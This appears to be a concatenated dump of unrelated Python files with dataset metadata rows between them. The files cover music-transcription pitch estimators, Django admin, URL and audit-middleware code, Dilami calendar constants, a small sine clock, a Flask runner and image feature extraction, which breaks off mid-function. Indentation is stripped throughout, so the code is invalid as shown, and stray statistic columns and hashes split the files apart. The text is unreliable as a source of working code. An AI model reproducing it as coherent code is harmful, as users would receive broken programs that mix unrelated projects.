def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
def estimate(self, raw_output):
"""
Estimate notes from a multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
batched_notes : ndarray (N x 3)
Array of note intervals and pitches by row
N - number of notes
"""
# Perform any pre-processing steps
raw_output = self.pre_proc(raw_output)
# Obtain the multi pitch activation map to transcribe
multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Convert the multi pitch array to a stacked multi pitch array
raw_output[tools.KEY_MULTIPITCH] = tools.multi_pitch_to_stacked_multi_pitch(multi_pitch)
# Obtain onsets and offsets from output if they exist
onsets = tools.unpack_dict(raw_output, tools.KEY_ONSETS)
offsets = tools.unpack_dict(raw_output, tools.KEY_OFFSETS)
if onsets is not None:
# Convert onsets to a stacked onset activation map
raw_output[tools.KEY_ONSETS] = tools.multi_pitch_to_stacked_multi_pitch(onsets)
if offsets is not None:
# Convert offsets to a stacked offset activation map
raw_output[tools.KEY_OFFSETS] = tools.multi_pitch_to_stacked_multi_pitch(offsets)
# Call the parent class estimate function. Multi pitch is just a special
# case of stacked multi pitch, where there is only one degree of freedom
output = super().estimate(raw_output)
# Add the estimated output to the raw output
pitches, intervals = tools.stacked_notes_to_notes(output)
batched_notes = tools.notes_to_batched_notes(pitches, intervals)
return batched_notes
def write(self, batched_notes, track):
"""
Write note estimates to a file.
Parameters
----------
batched_notes : ndarray (N x 3)
Array of note intervals and pitches by row
N - number of notes
track : string
Name of the track being processed
"""
# Convert the batched notes to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
# Stack the loose note groups
stacked_notes = tools.notes_to_stacked_notes(pitches, intervals)
# Call the parent function
super().write(stacked_notes, track)
class StackedMultiPitchRefiner(StackedNoteTranscriber):
"""
Refine stacked multi pitch activation maps, after using them to make note
predictions, by converting note estimates back into multi pitch activation.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Refine a stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_multi_pitch : ndarray (S x F x T)
Array of multiple discrete pitch activation maps
S - number of slices in stack
F - number of discrete pitches
T - number of frames
"""
# Attempt to extract pre-existing note estimates
stacked_notes = tools.unpack_dict(raw_output, tools.KEY_NOTES)
if stacked_notes is None:
# Obtain note estimates if they were not provided
stacked_notes = super().estimate(raw_output)
# Convert the stacked notes back into stacked multi pitch activation maps
stacked_multi_pitch = tools.stacked_multi_pitch_to_stacked_onsets(stacked_notes)
return stacked_multi_pitch
def write(self, stacked_multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
stacked_multi_pitch : ndarray (S x F x T)
Array of multiple discrete pitch activation maps
S - number of slices in stack
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
class MultiPitchRefiner(NoteTranscriber):
"""
Refine a multi pitch activation map, after using it to make note
predictions, by converting note estimates back into multi pitch activation.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Refine a multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
"""
# Attempt to extract pre-existing note estimates
batched_notes = tools.unpack_dict(raw_output, tools.KEY_NOTES)
if batched_notes is None:
# Obtain note estimates if they were not provided
batched_notes = super().estimate(raw_output)
# Convert the batched notes to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
# Obtain the frame times associated with the multi pitch array
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Convert the notes back into a multi pitch array
multi_pitch = tools.notes_to_multi_pitch(pitches, intervals, times, self.profile)
return multi_pitch
def write(self, multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
class StackedPitchListWrapper(Estimator):
"""
Wrapper for converting stacked multi pitch activations to stacked pitch lists.
"""
def __init__(self, profile, save_dir=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
"""
super().__init__(profile, save_dir)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for pitch lists.
"""
return tools.KEY_PITCHLIST
def estimate(self, raw_output):
"""
Convert stacked multi pitch activations to stacked pitch lists.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_pitch_list : dict
Dictionary containing (slice -> (times, pitch_list)) pairs
"""
# Obtain the stacked multi pitch activation maps
stacked_multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Obtain the frame times associated with the stacked activation map
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Perform the conversion
stacked_pitch_list = tools.stacked_multi_pitch_to_stacked_pitch_list(stacked_multi_pitch, times, self.profile)
return stacked_pitch_list
def write(self, stacked_pitch_list, track):
"""
Write slice-wise pitch estimates to respective files.
Parameters
----------
stacked_pitch_list : dict
Dictionary containing (slice -> (times, pitch_list)) pairs
track : string
Name of the track being processed
"""
# Obtain a list of the stacked pitch list keys
keys = list(stacked_pitch_list.keys())
# Determine how to name the results
tag = tools.get_tag(track)
# Loop through the slices of the stack
for key in keys:
# Add another tag for the degree of freedom if more than one
slice_tag = f'{tag}_{key}' if len(stacked_pitch_list) > 1 else f'{tag}'
# Construct a path for saving the estimates
path = os.path.join(self.save_dir, f'{slice_tag}.{tools.TXT_EXT}')
# Extract the pitch list from the stack
times, pitch_list = stacked_pitch_list[key]
# Write the notes to the path
tools.write_pitch_list(times, pitch_list, path)
class PitchListWrapper(StackedPitchListWrapper):
"""
    Wrapper for converting a multi pitch activation map to a pitch list.
"""
def __init__(self, profile, save_dir=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
"""
super().__init__(profile, save_dir)
def estimate(self, raw_output):
"""
        Convert a multi pitch activation map to a pitch list.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
pitch_list : list of ndarray (N x [...])
Array of pitches corresponding to notes
N - number of pitch observations (frames)
"""
# Obtain the multi pitch activation map
multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Obtain the frame times associated with the activation map
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Perform the conversion
pitch_list = tools.multi_pitch_to_pitch_list(multi_pitch, self.profile)
return times, pitch_list
def write(self, pitch_list, track):
"""
Write pitch estimates to a file.
Parameters
----------
pitch_list : tuple containing
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
pitch_list : list of ndarray (N x [...])
Array of pitches corresponding to notes
N - number of pitch observations (frames)
track : string
Name of the track being processed
"""
# Stack the pitch list
stacked_pitch_list = tools.pitch_list_to_stacked_pitch_list(*pitch_list)
# Call the parent function
super().write(stacked_pitch_list, track)
class TablatureWrapper(Estimator):
"""
Wrapper for converting tablature to multi pitch.
"""
def __init__(self, profile, save_dir=None, stacked=False):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
stacked : bool
Whether to collapse into a single representation or leave stacked
"""
super().__init__(profile, save_dir)
self.stacked = stacked
def get_key(self):
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Convert tablature into a single or stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
multi_pitch : ndarray ((S) x F x T)
Discrete pitch activation map
S - number of slices in stack - only if stacked=True
F - number of discrete pitches
T - number of frames
"""
# Obtain the tablature
tablature = tools.unpack_dict(raw_output, tools.KEY_TABLATURE)
# Perform the conversion
multi_pitch = tools.tablature_to_stacked_multi_pitch(tablature, self.profile)
if not self.stacked:
multi_pitch = tools.stacked_multi_pitch_to_multi_pitch(multi_pitch)
return multi_pitch
def write(self, multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
multi_pitch : ndarray ((S) x F x T)
Discrete pitch activation map
S - number of slices in stack - only if stacked=True
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
| 31.088174
| 118
| 0.622076
| 24,688
| 0.823785
| 0
| 0
| 1,929
| 0.064367
| 0
| 0
| 17,863
| 0.596049
|
a25d09e67ac4aff5540ba2b0f11ec21250507d36
| 121
|
py
|
Python
|
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Tasks
admin.site.register(Tasks)
# Register your models here.
| 20.166667
| 33
| 0.768595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.239669
|
a25efb76b91de6c5a6535d8621723808a44381dd
| 8,046
|
py
|
Python
|
dilami_calendar/constants.py
|
Jangal/python-deylami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | 12
|
2019-08-05T19:11:24.000Z
|
2021-11-17T03:52:12.000Z
|
dilami_calendar/constants.py
|
Jangal/python-dilami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | 2
|
2019-08-03T05:42:02.000Z
|
2021-12-01T07:34:26.000Z
|
dilami_calendar/constants.py
|
Jangal/python-dilami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | null | null | null |
DILAMI_WEEKDAY_NAMES = {
0: "شمبه",
1: "یکشمبه",
2: "دۊشمبه",
3: "سۊشمبه",
4: "چارشمبه",
5: "پئنشمبه",
6: "جۊمه",
}
DILAMI_MONTH_NAMES = {
0: "پنجيک",
1: "نؤرۊز ما",
2: "کۊرچ ٚ ما",
3: "أرئه ما",
4: "تیر ما",
5: "مۊردال ما",
6: "شریرما",
7: "أمیر ما",
8: "آول ما",
9: "سیا ما",
10: "دیا ما",
11: "ورفن ٚ ما",
12: "اسفندار ما",
}
DILAMI_LEAP_YEARS = (
199,
203,
207,
211,
215,
220,
224,
228,
232,
236,
240,
244,
248,
253,
257,
261,
265,
269,
273,
277,
281,
286,
290,
294,
298,
302,
306,
310,
315,
319,
323,
327,
331,
335,
339,
343,
348,
352,
356,
360,
364,
368,
372,
376,
381,
385,
389,
393,
397,
401,
405,
409,
414,
418,
422,
426,
430,
434,
438,
443,
447,
451,
455,
459,
463,
467,
471,
476,
480,
484,
488,
492,
496,
500,
504,
509,
513,
517,
521,
525,
529,
533,
537,
542,
546,
550,
554,
558,
562,
566,
571,
575,
579,
583,
587,
591,
595,
599,
604,
608,
612,
616,
620,
624,
628,
632,
637,
641,
645,
649,
653,
657,
661,
665,
669,
674,
678,
682,
686,
690,
694,
698,
703,
707,
711,
715,
719,
723,
727,
731,
736,
740,
744,
748,
752,
756,
760,
764,
769,
773,
777,
781,
785,
789,
793,
797,
802,
806,
810,
814,
818,
822,
826,
831,
835,
839,
843,
847,
851,
855,
859,
864,
868,
872,
876,
880,
884,
888,
892,
897,
901,
905,
909,
913,
917,
921,
925,
930,
934,
938,
942,
946,
950,
954,
959,
963,
967,
971,
975,
979,
983,
987,
992,
996,
1000,
1004,
1008,
1012,
1016,
1020,
1025,
1029,
1033,
1037,
1041,
1045,
1049,
1053,
1058,
1062,
1066,
1070,
1074,
1078,
1082,
1087,
1091,
1095,
1099,
1103,
1107,
1111,
1115,
1120,
1124,
1128,
1132,
1136,
1140,
1144,
1148,
1153,
1157,
1161,
1165,
1169,
1173,
1177,
1181,
1186,
1190,
1194,
1198,
1202,
1206,
1210,
1215,
1219,
1223,
1227,
1231,
1235,
1239,
1243,
1248,
1252,
1256,
1260,
1264,
1268,
1272,
1276,
1281,
1285,
1289,
1293,
1297,
1301,
1305,
1309,
1314,
1318,
1322,
1326,
1330,
1334,
1338,
1343,
1347,
1351,
1355,
1359,
1363,
1367,
1371,
1376,
1380,
1384,
1388,
1392,
1396,
1400,
1404,
1409,
1413,
1417,
1421,
1425,
1429,
1433,
1437,
1442,
1446,
1450,
1454,
1458,
1462,
1466,
1471,
1475,
1479,
1483,
1487,
1491,
1495,
1499,
1504,
1508,
1512,
1516,
1520,
1524,
1528,
1532,
1537,
1541,
1545,
1549,
1553,
1557,
1561,
1565,
1570,
1574,
1578,
1582,
1586,
1590,
1594,
1599,
1603,
1607,
1611,
1615,
1619,
1623,
1627,
1632,
1636,
1640,
1644,
1648,
1652,
1656,
1660,
1665,
1669,
1673,
1677,
1681,
1685,
1689,
1693,
1698,
1702,
1706,
1710,
1714,
1718,
1722,
1727,
1731,
1735,
1739,
1743,
1747,
1751,
1755,
1760,
1764,
1768,
1772,
1776,
1780,
1784,
1788,
1793,
1797,
1801,
1805,
1809,
1813,
1817,
1821,
1826,
1830,
1834,
1838,
1842,
1846,
1850,
1855,
1859,
1863,
1867,
1871,
1875,
1879,
1883,
1888,
1892,
1896,
1900,
1904,
1908,
1912,
1916,
1921,
1925,
1929,
1933,
1937,
1941,
1945,
1949,
1954,
1958,
1962,
1966,
1970,
1974,
1978,
1983,
1987,
1991,
1995,
1999,
2003,
2007,
2011,
2016,
2020,
2024,
2028,
2032,
2036,
2040,
2044,
2049,
2053,
2057,
2061,
2065,
2069,
2073,
2077,
2082,
2086,
2090,
2094,
2098,
2102,
2106,
2111,
2115,
2119,
2123,
2127,
2131,
2135,
2139,
2144,
2148,
2152,
2156,
2160,
2164,
2168,
2172,
2177,
2181,
2185,
2189,
2193,
2197,
2201,
2205,
2210,
2214,
2218,
2222,
2226,
2230,
2234,
2239,
2243,
2247,
2251,
2255,
2259,
2263,
2267,
2272,
2276,
2280,
2284,
2288,
2292,
2296,
2300,
2305,
2309,
2313,
2317,
2321,
2325,
2329,
2333,
2338,
2342,
2346,
2350,
2354,
2358,
2362,
2367,
2371,
2375,
2379,
2383,
2387,
2391,
2395,
2400,
2404,
2408,
2412,
2416,
2420,
2424,
2428,
2433,
2437,
2441,
2445,
2449,
2453,
2457,
2461,
2466,
2470,
2474,
2478,
2482,
2486,
2490,
2495,
2499,
2503,
2507,
2511,
2515,
2519,
2523,
2528,
2532,
2536,
2540,
2544,
2548,
2552,
2556,
2561,
2565,
2569,
2573,
2577,
2581,
2585,
2589,
2594,
2598,
2602,
2606,
2610,
2614,
2618,
2623,
2627,
2631,
2635,
2639,
2643,
2647,
2651,
2656,
2660,
2664,
2668,
2672,
2676,
2680,
2684,
2689,
2693,
2697,
2701,
2705,
2709,
2713,
2717,
2722,
2726,
2730,
2734,
2738,
2742,
2746,
2751,
2755,
2759,
2763,
2767,
2771,
2775,
2779,
2784,
2788,
2792,
2796,
2800,
2804,
2808,
2812,
2817,
2821,
2825,
2829,
2833,
2837,
2841,
2845,
2850,
2854,
2858,
2862,
2866,
2870,
2874,
2879,
2883,
2887,
2891,
2895,
2899,
2903,
2907,
2912,
2916,
2920,
2924,
2928,
2932,
2936,
2940,
2945,
2949,
2953,
2957,
2961,
2965,
2969,
2973,
2978,
2982,
2986,
2990,
2994,
2998,
3002,
3007,
3011,
3015,
3019,
3023,
3027,
3031,
3035,
3040,
3044,
3048,
3052,
3056,
3060,
3064,
3068,
3073,
3077,
3081,
3085,
3089,
3093,
3097,
3101,
3106,
3110,
3114,
3118,
3122,
3126,
3130,
3135,
3139,
3143,
3147,
3151,
3155,
3159,
3163,
3168,
3172,
3176,
3180,
3184,
3188,
3192,
3196,
3201,
3205,
3209,
3213,
3217,
3221,
3225,
3229,
3234,
3238,
3242,
3246,
3250,
3254,
3258,
3263,
3267,
3271,
3275,
3279,
3283,
3287,
3291,
3296,
3300,
3304,
3308,
3312,
3316,
3320,
3324,
3329,
3333,
3337,
3341,
3345,
3349,
3353,
3357,
3362,
3366,
3370,
)
#: Minimum year supported by the library.
MINYEAR = 195
#: Maximum year supported by the library.
MAXYEAR = 3372
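# Illustrative helper sketch (not part of the original module): membership
# tests against the long tuple above are O(n); a frozenset makes the common
# "is this a leap year?" check O(1). Both names below are hypothetical.
_DILAMI_LEAP_SET = frozenset(DILAMI_LEAP_YEARS)
def is_dilami_leap_year(year):
    # Hypothetical convenience wrapper for illustration only.
    return MINYEAR <= year <= MAXYEAR and year in _DILAMI_LEAP_SET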
| 10.007463
| 41
| 0.393239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.046161
|
a25fceaa81b9a2397bbf59a5c9765ebd1d84a0d6
| 324
|
py
|
Python
|
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
import math
from inputs.sine import Sine
from inputs.timeElapsed import TimeElapsed
from utils.number import Number
class SineClock(Number):
def __init__(self, sine: Sine):
self.__sine = sine
self.__elapsed = TimeElapsed()
def get(self):
return self.__sine.at_time(self.__elapsed.get())
| 20.25
| 56
| 0.70679
| 203
| 0.626543
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a26034218c90d245fe24941c0da299f8ed7dd85c
| 667
|
py
|
Python
|
config/urls.py
|
erik-sn/tagmap
|
8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
config/urls.py
|
erik-sn/tagmap
|
8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
config/urls.py
|
erik-sn/tagmap
|
8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls import url, include
from django.contrib import admin
from api.views import index
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
]
# troubleshooting tool
if settings.TOOLBAR:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
"""
If we are serving the base HTML file through Django, then
route all non-matching URLs to the HTML file, where they
will be processed on the client by the React application.
"""
if settings.SERVER_TYPE.upper() == 'DJANGO':
urlpatterns += [url(r'^.*$', index)]
| 25.653846
| 57
| 0.706147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 256
| 0.383808
|
a26076e09d7b45380034f14f9bab4f75147d9786
| 86
|
py
|
Python
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 10
|
2019-06-12T01:18:44.000Z
|
2021-12-19T16:12:08.000Z
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 7
|
2019-03-20T23:47:49.000Z
|
2019-04-10T19:23:41.000Z
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 3
|
2020-10-16T04:30:09.000Z
|
2021-03-16T18:45:33.000Z
|
#!flask/bin/python
from app import app
app.run(host='127.0.0.1',port=8080,debug=True)
| 21.5
| 46
| 0.732558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.337209
|
a26126e8b013a4ee9583aa03f98292063e236062
| 2,572
|
py
|
Python
|
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | 1
|
2016-05-06T07:07:18.000Z
|
2016-05-06T07:07:18.000Z
|
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | null | null | null |
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2009 James Aylett <http://tartarus.org/james/computers/django/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from django.db.models.signals import pre_save
import threading
import datetime
stash = threading.local()
def get_current_user():
"""Get the user whose session resulted in the current code running. (Only valid during requests.)"""
return getattr(stash, 'current_user', None)
def set_current_user(user):
stash.current_user = user
def onanymodel_presave(sender, **kwargs):
current_user = get_current_user()
if current_user is None or not current_user.is_authenticated():
# if there is no current user or we're an unauthenticated user (ie: guest)
# then don't do anything. The save() will fail if created_by or modified_by
# are null=False, and not otherwise; ie the behaviour is controlled by the
# models, as desired.
current_user = None
obj = kwargs['instance']
if hasattr(obj, 'modified_at'):
obj.modified_at = datetime.datetime.now()
if hasattr(obj, 'modified_by_id'):
if current_user and current_user.is_authenticated():
obj.modified_by = current_user
if not obj.pk:
if hasattr(obj, 'created_at'):
obj.created_at = datetime.datetime.now()
if hasattr(obj, 'created_by_id') and not obj.created_by:
obj.created_by = current_user
pre_save.connect(onanymodel_presave)
class AutoCreatedAndModifiedFields:
def process_request(self, request):
set_current_user(request.user)
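# Hedged sketch (not part of the original file): the class above uses the
# pre-Django-1.10 `process_request` middleware hook. Under the newer-style
# MIDDLEWARE setting, an equivalent callable middleware would look roughly
# like this; the class name is hypothetical.
class CurrentUserMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response
    def __call__(self, request):
        # Stash the requesting user so the pre_save signal handler can find it
        set_current_user(request.user)
        return self.get_response(request)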
| 42.866667
| 104
| 0.734059
| 114
| 0.044323
| 0
| 0
| 0
| 0
| 0
| 0
| 1,545
| 0.6007
|
a261c4073b37f990b45a6d0c9e5cc17d54ee8a8f
| 24,440
|
py
|
Python
|
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
# main imports
import numpy as np
import sys
# image transform imports
from PIL import Image
from skimage import color
from sklearn.decomposition import FastICA
from sklearn.decomposition import IncrementalPCA
from sklearn.decomposition import TruncatedSVD
from numpy.linalg import svd as lin_svd
from scipy.signal import medfilt2d, wiener, cwt
import pywt
import cv2
from ipfml.processing import transform, compression, segmentation
from ipfml.filters import convolution, kernels
from ipfml import utils
# modules and config imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
def get_image_features(data_type, block):
"""
    Compute and return the feature data corresponding to the requested data type
"""
if data_type == 'lab':
block_file_path = '/tmp/lab_img.png'
block.save(block_file_path)
data = transform.get_LAB_L_SVD_s(Image.open(block_file_path))
if data_type == 'mscn':
img_mscn_revisited = transform.rgb_to_mscn(block)
# save tmp as img
img_output = Image.fromarray(img_mscn_revisited.astype('uint8'), 'L')
mscn_revisited_file_path = '/tmp/mscn_revisited_img.png'
img_output.save(mscn_revisited_file_path)
img_block = Image.open(mscn_revisited_file_path)
# extract from temp image
data = compression.get_SVD_s(img_block)
"""if data_type == 'mscn':
img_gray = np.array(color.rgb2gray(np.asarray(block))*255, 'uint8')
img_mscn = transform.calculate_mscn_coefficients(img_gray, 7)
img_mscn_norm = transform.normalize_2D_arr(img_mscn)
img_mscn_gray = np.array(img_mscn_norm*255, 'uint8')
data = compression.get_SVD_s(img_mscn_gray)
"""
if data_type == 'low_bits_6':
low_bits_6 = transform.rgb_to_LAB_L_low_bits(block, 6)
data = compression.get_SVD_s(low_bits_6)
if data_type == 'low_bits_5':
low_bits_5 = transform.rgb_to_LAB_L_low_bits(block, 5)
data = compression.get_SVD_s(low_bits_5)
if data_type == 'low_bits_4':
low_bits_4 = transform.rgb_to_LAB_L_low_bits(block, 4)
data = compression.get_SVD_s(low_bits_4)
if data_type == 'low_bits_3':
low_bits_3 = transform.rgb_to_LAB_L_low_bits(block, 3)
data = compression.get_SVD_s(low_bits_3)
if data_type == 'low_bits_2':
low_bits_2 = transform.rgb_to_LAB_L_low_bits(block, 2)
data = compression.get_SVD_s(low_bits_2)
if data_type == 'low_bits_4_shifted_2':
data = compression.get_SVD_s(transform.rgb_to_LAB_L_bits(block, (3, 6)))
if data_type == 'sub_blocks_stats':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=100)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_stats_reduced':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area_normed':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
l_svd_data = utils.normalize_arr(l_svd_data)
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'mscn_var_4':
data = _get_mscn_variance(block, (100, 100))
if data_type == 'mscn_var_16':
data = _get_mscn_variance(block, (50, 50))
if data_type == 'mscn_var_64':
data = _get_mscn_variance(block, (25, 25))
if data_type == 'mscn_var_16_max':
data = _get_mscn_variance(block, (50, 50))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'mscn_var_64_max':
data = _get_mscn_variance(block, (25, 25))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'ica_diff':
current_image = transform.get_LAB_L(block)
ica = FastICA(n_components=50)
ica.fit(current_image)
image_ica = ica.fit_transform(current_image)
image_restored = ica.inverse_transform(image_ica)
final_image = utils.normalize_2D_arr(image_restored)
final_image = np.array(final_image * 255, 'uint8')
sv_values = utils.normalize_arr(compression.get_SVD_s(current_image))
ica_sv_values = utils.normalize_arr(compression.get_SVD_s(final_image))
